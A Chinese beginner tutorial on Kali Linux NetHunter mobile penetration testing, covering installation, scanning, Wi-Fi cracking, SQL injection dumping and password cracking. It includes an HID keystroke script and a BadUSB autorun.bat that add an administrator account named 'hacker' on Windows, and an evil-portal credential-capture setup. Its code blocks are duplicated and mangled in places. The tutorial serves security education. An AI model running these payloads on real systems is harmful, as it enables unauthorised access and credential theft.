Kali Linux NetHunter初级教程轻松入门移动设备渗透测试技术

威震华夏关云长

1. Kali Linux NetHunter简介

Kali Linux NetHunter是一款基于Android系统的移动渗透测试平台，它将Kali Linux的强大功能移植到了移动设备上。作为安全研究人员和渗透测试人员的理想工具，NetHunter允许用户在智能手机或平板电脑上执行各种安全测试任务，无需携带笨重的笔记本电脑。

NetHunter由Offensive Security团队开发，该团队也是Kali Linux的创建者。这个平台不仅包含了Kali Linux中的大量渗透测试工具，还增加了一些专门针对移动设备的特有功能，如USB HID攻击、BadUSB攻击等。

1.1 NetHunter的主要特点

• 完整的Kali Linux工具集：包含了数百个渗透测试工具，从信息收集到漏洞利用，一应俱全。
• 定制化内核：支持802.11无线注入和USB HID攻击等功能。
• 便携性：将强大的渗透测试平台放入口袋，随时随地进行安全测试。
• 多设备支持：支持多种Android设备，包括手机、平板电脑甚至Chromebook。
• 易于使用的界面：提供了直观的用户界面，使初学者也能轻松上手。

1.2 适用场景

NetHunter适用于多种安全测试场景，包括但不限于：

• 无线网络安全评估
• 网络渗透测试
• 移动应用安全测试
• 社会工程学演练
• 物理安全测试

2. NetHunter的安装与配置

2.1 系统要求

在安装NetHunter之前，需要确保你的设备满足以下基本要求：

• 支持的Android设备（NetHunter官网提供了完整的设备兼容性列表）
• Android系统版本6.0或更高
• 至少4GB的可用存储空间（完整安装可能需要更多）
• 设备需要解锁Bootloader并支持自定义恢复（如TWRP）

2.2 安装步骤

以下是安装NetHunter的基本步骤，以支持的Nexus设备为例：

1. 备份数据：安装过程会清除设备上的所有数据，请提前备份重要信息。
2. 解锁Bootloader：
“`bash启用开发者选项和USB调试在设备上：设置 > 关于手机 > 连续点击”版本号”7次返回设置 > 开发者选项 > 启用”USB调试”和”OEM解锁”

备份数据：安装过程会清除设备上的所有数据，请提前备份重要信息。

解锁Bootloader：
“`bash

# 在电脑上，安装ADB和Fastboot工具
   # 然后连接设备并执行以下命令：
   adb reboot bootloader
   fastboot oem unlock
   fastboot reboot

2. 3. **安装自定义恢复**（如TWRP）：
3.    ```bash
4.    # 下载适用于你设备的TWRP镜像
5.    # 然后执行以下命令：
6.    adb reboot bootloader
7.    fastboot flash recovery twrp.img
8.    fastboot reboot

复制代码

1. 下载NetHunter镜像：从NetHunter官网下载适用于你设备的NetHunter镜像文件。
2. 刷入NetHunter：
“`bash将设备重启到Recovery模式adb reboot recovery

下载NetHunter镜像：从NetHunter官网下载适用于你设备的NetHunter镜像文件。

刷入NetHunter：
“`bash

adb reboot recovery

# 在TWRP界面中，选择”Install”并刷入以下文件（按顺序）：
   # 1. NetHunter ROM
   # 2. 适用于你设备的NetHunter内核
   # 3. NetHunter补丁包（如果有）

# 完成后重启设备

2. 3. **初始设置**：
3.    - 设备首次启动可能需要较长时间
4.    - 完成Android初始设置
5.    - 启动NetHunter应用，完成初始化配置
7. ### 2.3 基本配置
9. #### 2.3.1 更新NetHunter
11. 安装完成后，建议更新NetHunter到最新版本：
13. ```bash
14. # 打开NetHunter终端应用
15. # 执行以下命令更新软件包列表
16. apt update
18. # 升级已安装的软件包
19. apt upgrade -y
21. # 清理不需要的软件包
22. apt autoremove -y

复制代码

NetHunter支持多种网络连接方式，包括Wi-Fi、移动数据和USB网络共享。

• Wi-Fi连接：通过Android系统设置连接Wi-Fi网络
• USB网络共享：
“`bash启用USB调试在NetHunter终端中执行：adb shell
su
setprop service.adb.tcp.port 5555
stop adbd
start adbd

Wi-Fi连接：通过Android系统设置连接Wi-Fi网络

USB网络共享：
“`bash

adb shell
su
setprop service.adb.tcp.port 5555
stop adbd
start adbd

# 然后可以通过USB连接到电脑，并使用以下命令连接：
  adb connect <设备IP地址>:5555

2. ## 3. NetHunter基本使用
4. ### 3.1 NetHunter界面介绍
6. NetHunter提供了直观的用户界面，主要包括以下几个部分：
8. - **NetHunter应用**：Android系统中的主应用，提供对各种工具和功能的访问
9. - **NetHunter终端**：一个完整的Linux终端环境，可以运行Kali Linux命令和工具
10. - **Kali服务**：用于启动和管理各种安全服务的界面
11. - **HID攻击**：用于配置和执行USB HID攻击的工具
13. ### 3.2 基本命令和操作
15. #### 3.2.1 终端基本命令
17. NetHunter终端是一个完整的Linux环境，支持大多数Kali Linux命令：
19. ```bash
20. # 查看系统信息
21. uname -a
22. cat /etc/os-release
24. # 文件操作
25. ls -la  # 列出当前目录下的文件和文件夹
26. cd /path/to/directory  # 切换目录
27. pwd  # 显示当前工作目录
28. mkdir new_directory  # 创建新目录
29. rm file.txt  # 删除文件
30. rm -r directory  # 删除目录
32. # 网络工具
33. ping google.com  # 测试网络连接
34. ifconfig  # 查看网络接口配置
35. netstat -tuln  # 查看监听的网络端口

复制代码

NetHunter允许你启动各种安全服务，如SSH、VNC、HTTP等：

2. # 启动SSH服务
3. service ssh start
5. # 启动Apache服务
6. service apache2 start
8. # 启动MySQL服务
9. service mysql start
11. # 检查服务状态
12. service ssh status

复制代码

你也可以通过NetHunter应用界面来管理这些服务：

1. 打开NetHunter应用
2. 选择”Kali服务”选项
3. 选择要启动或停止的服务
4. 点击相应的按钮执行操作

3.3 安装额外工具

虽然NetHunter已经预装了大量工具，但你可能需要安装额外的工具：

2. # 搜索可用的软件包
3. apt search keyword
5. # 安装软件包
6. apt install package_name
8. # 例如，安装Nmap（如果未预装）
9. apt install nmap
11. # 安装Metasploit框架
12. apt install metasploit-framework

复制代码

4. 常用渗透测试工具

4.1 信息收集工具

Nmap是一款强大的网络扫描和主机发现工具，常用于网络审计和安全扫描。

2. # 基本端口扫描
3. nmap target_ip
5. # 全面扫描所有端口，并尝试确定服务版本
6. nmap -sV -p- target_ip
8. # 操作系统检测
9. nmap -O target_ip
11. # 扫描整个网络段
12. nmap -sn 192.168.1.0/24
14. # 使用Nmap脚本引擎(NSE)进行漏洞扫描
15. nmap --script vuln target_ip
17. # 保存扫描结果
18. nmap -oN scan_results.txt target_ip

复制代码

Maltego是一款开源的情报收集和关系分析工具，可用于收集和分析有关目标的各种信息。

在NetHunter中使用Maltego：

1. 打开NetHunter应用
2. 选择”工具” > “信息收集” > “Maltego”
3. 创建新的Maltego图
4. 选择要运行的转换（例如，域名、电子邮件地址、公司名称等）
5. 运行转换并分析结果

4.2 漏洞评估工具

OpenVAS是一款功能强大的漏洞扫描器，可以检测系统和网络中的安全漏洞。

2. # 启动OpenVAS服务
3. service openvas start
5. # 访问OpenVAS Web界面
6. # 在浏览器中访问：https://127.0.0.1:9392
8. # 使用命令行创建新任务
9. omp -u admin -w password -C "New Task"

复制代码

Nikto是一款Web服务器扫描器，可以检测Web服务器中的潜在危险文件和配置。

2. # 基本Web扫描
3. nikto -h http://target_website.com
5. # 使用代理扫描
6. nikto -h http://target_website.com -useproxy http://proxy_address:port
8. # 指定端口扫描
9. nikto -h http://target_website.com -p 8080
11. # 保存扫描结果
12. nikto -h http://target_website.com -output scan_results.txt

复制代码

4.3 无线安全工具

Aircrack-ng是一套用于评估Wi-Fi网络安全的工具集。

2. # 启动无线网卡监听模式
3. airmon-ng start wlan0
5. # 扫描周围的无线网络
6. airodump-ng wlan0mon
8. # 捕获特定网络的流量
9. airodump-ng -c channel --bssid target_bssid -w capture wlan0mon
11. # 对捕获的握手包进行破解
12. aircrack-ng -w wordlist.txt capture-01.cap
14. # 停止监听模式
15. airmon-ng stop wlan0mon

复制代码

Wifite是一款自动化的无线审计工具，简化了对Wi-Fi网络的攻击过程。

2. # 启动Wifite
3. wifite
5. # 指定攻击目标
6. wifite -target target_bssid
8. # 使用特定字典文件
9. wifite -dict /path/to/wordlist.txt
11. # 仅针对WPS网络
12. wifite -wps

复制代码

4.4 Web应用安全工具

SQLMap是一款自动化的SQL注入工具，可以检测和利用SQL注入漏洞。

2. # 基本SQL注入测试
3. sqlmap -u "http://target_website.com/page.php?id=1"
5. # 指定数据库类型
6. sqlmap -u "http://target_website.com/page.php?id=1" --dbms=mysql
8. # 获取所有数据库
9. sqlmap -u "http://target_website.com/page.php?id=1" --dbs
11. # 获取指定数据库的所有表
12. sqlmap -u "http://target_website.com/page.php?id=1" -D database_name --tables
14. # 获取指定表的所有列
15. sqlmap -u "http://target_website.com/page.php?id=1" -D database_name -T table_name --columns
17. # 获取数据
18. sqlmap -u "http://target_website.com/page.php?id=1" -D database_name -T table_name -C column1,column2 --dump

复制代码

Burp Suite是一款集成化的Web应用安全测试平台，提供了多种工具用于攻击Web应用程序。

在NetHunter中使用Burp Suite：

1. 打开NetHunter应用
2. 选择”工具” > “Web应用分析” > “Burp Suite”
3. 配置浏览器代理以使用Burp Suite（默认为127.0.0.1:8080）
4. 使用Burp的各个模块（Proxy, Scanner, Intruder等）进行测试

4.5 密码攻击工具

John the Ripper是一款流行的密码破解工具，支持多种密码哈希类型。

2. # 基本密码破解
3. john password_file.txt
5. # 指定密码格式
6. john --format=sha256crypt password_file.txt
8. # 使用自定义字典
9. john --wordlist=custom_dict.txt password_file.txt
11. # 显示已破解的密码
12. john --show password_file.txt

复制代码

Hashcat是一款高级的密码恢复工具，支持GPU加速，可以大大提高破解速度。

2. # 基本密码破解
3. hashcat -m 0 -a 0 hash.txt wordlist.txt
5. # 使用GPU加速
6. hashcat -m 0 -a 0 -d 1 hash.txt wordlist.txt
8. # 指定哈希类型（-m参数）
9. # 例如，MD5哈希类型为0，SHA1为100，SHA256为1400
10. hashcat -m 100 -a 0 hash.txt wordlist.txt
12. # 暴力破解模式
13. hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
15. # 显示破解结果
16. hashcat --show hash.txt

复制代码

5. 实际渗透测试案例

5.1 无线网络渗透测试

在这个案例中，我们将演示如何使用NetHunter对Wi-Fi网络进行基本的安全评估。

2. # 确保无线网卡支持监听模式
3. airmon-ng check kill
5. # 启动监听模式
6. airmon-ng start wlan0

复制代码

2. # 扫描周围的无线网络
3. airodump-ng wlan0mon
5. # 记录目标网络的BSSID和频道

复制代码

2. # 捕获目标网络的流量
3. airodump-ng -c channel --bssid target_bssid -w capture wlan0mon
5. # 在另一个终端中，进行去认证攻击以加速握手包捕获
6. aireplay-ng -0 10 -a target_bssid wlan0mon

复制代码

2. # 使用字典攻击破解密码
3. aircrack-ng -w wordlist.txt capture-01.cap
5. # 或者使用Hashcat进行GPU加速破解
6. # 首先将.cap文件转换为.hccapx格式
7. aircrack-ng -J output capture-01.cap
9. # 然后使用Hashcat破解
10. hashcat -m 2500 output.hccapx wordlist.txt

复制代码

5.2 Web应用渗透测试

在这个案例中，我们将演示如何使用NetHunter对Web应用进行基本的安全评估。

2. # 使用Nmap扫描目标服务器
3. nmap -sV -p- target_ip
5. # 使用Dirb扫描目录和文件
6. dirb http://target_website.com
8. # 使用WhatWeb识别技术栈
9. whatweb http://target_website.com

复制代码

2. # 使用Nikto扫描Web服务器
3. nikto -h http://target_website.com
5. # 使用SQLMap测试SQL注入
6. sqlmap -u "http://target_website.com/page.php?id=1" --batch

复制代码

2. # 使用Curl测试HTTP头
3. curl -I http://target_website.com
5. # 使用Wget获取网页内容
6. wget -O page.html http://target_website.com
8. # 使用Grep搜索敏感信息
9. grep -i "password\|admin\|login" page.html

复制代码

5.3 移动应用渗透测试

在这个案例中，我们将演示如何使用NetHunter对Android应用进行基本的安全评估。

2. # 获取APK文件（可以从设备中提取或从网上下载）
3. adb pull /path/to/app.apk
5. # 使用Apktool反编译APK
6. apktool d app.apk
8. # 查看应用清单文件
9. cat app/AndroidManifest.xml
11. # 查看应用资源
12. ls -la app/res/

复制代码

2. # 使用Jadx反编译APK
3. jadx -d output_dir app.apk
5. # 查看反编译的Java代码
6. ls -la output_dir/sources/
8. # 搜索敏感信息
9. grep -r "password\|api_key\|token" output_dir/sources/

复制代码

2. # 安装应用到设备
3. adb install app.apk
5. # 启动应用
6. adb shell am start -n com.example.app/.MainActivity
8. # 使用Drozer进行动态分析
9. drozer console connect
10. # 在Drozer控制台中
11. run app.package.info -a com.example.app
12. run app.package.attacksurface com.example.app

复制代码

6. NetHunter高级功能

6.1 HID攻击

HID（Human Interface Device）攻击是NetHunter的一项强大功能，允许将Android设备模拟成键盘或鼠标，从而对连接的计算机执行预设的攻击脚本。

2. # 启动HID攻击服务
3. service hid start
5. # 编辑HID攻击脚本
6. nano /usr/share/hidattacks/attack.txt
8. # 示例攻击脚本（Windows系统，打开命令提示符并添加管理员用户）
9. GUI r
10. DELAY 500
11. STRING cmd
12. DELAY 500
13. CTRL-SHIFT ENTER
14. DELAY 1000
15. ALT y
16. DELAY 500
17. STRING net user hacker Password123 /add
18. DELAY 500
19. ENTER
20. DELAY 500
21. STRING net localgroup administrators hacker /add
22. DELAY 500
23. ENTER

复制代码

1. 将Android设备通过USB连接到目标计算机
2. 在NetHunter应用中，选择”HID攻击”
3. 选择要执行的攻击脚本
4. 点击”运行”按钮开始攻击

6.2 BadUSB攻击

BadUSB攻击是HID攻击的一种变体，通过将Android设备模拟成USB存储设备，并在其中包含恶意脚本或可执行文件。

2. # 创建ISO镜像
3. mkdir -p /tmp/badusb
4. cd /tmp/badusb
6. # 创建一个自动运行的批处理文件
7. echo "@echo off" > autorun.bat
8. echo "net user hacker Password123 /add" >> autorun.bat
9. echo "net localgroup administrators hacker /add" >> autorun.bat
11. # 创建ISO镜像
12. genisoimage -o badusb.iso /tmp/badusb

复制代码

1. 在NetHunter应用中，选择”BadUSB攻击”
2. 选择创建的ISO镜像
3. 将Android设备通过USB连接到目标计算机
4. 点击”运行”按钮开始攻击

6.3 MANA Evil Portal

MANA Evil Portal是NetHunter中的一个功能，允许创建一个恶意的Wi-Fi接入点，用于捕获凭证或执行中间人攻击。

2. # 启动MANA工具包
3. service mana start
5. # 配置 Evil Portal
6. cd /etc/mana-toolkit
7. nano hostapd-mana.conf
9. # 修改以下参数：
10. # ssid=FreeWiFi
11. # interface=wlan0
12. # channel=6

复制代码

2. # 启动 Evil Portal
3. mana-toolkit start evilportal
5. # 查看捕获的凭证
6. tail -f /var/lib/mana-toolkit/evilportal/creds.txt

复制代码

7. 注意事项和最佳实践

7.1 法律和道德考虑

渗透测试是一项强大的技术，但也可能被滥用。在使用NetHunter进行任何测试之前，请务必考虑以下几点：

• 获得授权：永远只在你拥有明确授权的系统或网络上进行测试。
• 遵守法律：确保你的测试活动符合当地法律法规。
• 尊重隐私：不要收集或存储不必要的个人信息。
• 负责任披露：如果你发现安全漏洞，应负责任地向相关方报告，而不是公开或利用。

7.2 安全最佳实践

在使用NetHunter时，遵循以下安全最佳实践：

• 保持更新：定期更新NetHunter和其中的工具，以确保你拥有最新的功能和漏洞修复。
• 使用强密码：为你的设备和NetHunter设置强密码，防止未授权访问。
• 加密数据：考虑对敏感数据进行加密，特别是存储在设备上的测试结果。
• 最小权限原则：在可能的情况下，使用最低必要的权限执行操作。
• 隔离测试环境：在隔离的测试环境中进行实验，避免影响生产系统。

7.3 学习资源

要进一步提高你的NetHunter技能，以下资源可能会有所帮助：

• 官方文档：Kali Linux NetHunter官方文档
• 在线课程：Offensive Security提供的相关培训课程
• 社区论坛：Kali Linux Forums
• YouTube教程：许多安全专家在YouTube上分享了NetHunter的教程和技巧
• 实践平台：如Hack The Box、TryHackMe等在线实践平台

8. 总结

Kali Linux NetHunter是一款功能强大的移动渗透测试平台，它将Kali Linux的丰富工具集移植到了Android设备上。通过本教程，我们了解了NetHunter的基本概念、安装方法、常用工具以及实际应用案例。

作为初学者，你可以从基本的信息收集和漏洞扫描开始，逐步探索更高级的功能，如HID攻击和无线渗透测试。记住，渗透测试是一项需要不断学习和实践的技能，而NetHunter为你提供了一个便携且功能强大的平台。

最重要的是，始终以道德和负责任的方式使用这些工具。只有在获得明确授权的情况下，才能对系统或网络进行测试。通过合法和道德的方式使用NetHunter，你将能够提高自己的安全技能，同时为构建更安全的数字世界做出贡献。

随着技术的不断发展，NetHunter也在不断更新和完善。保持学习的态度，关注最新的安全趋势和技术，将帮助你在渗透测试领域取得更大的进步。祝你在NetHunter的学习之旅中取得成功！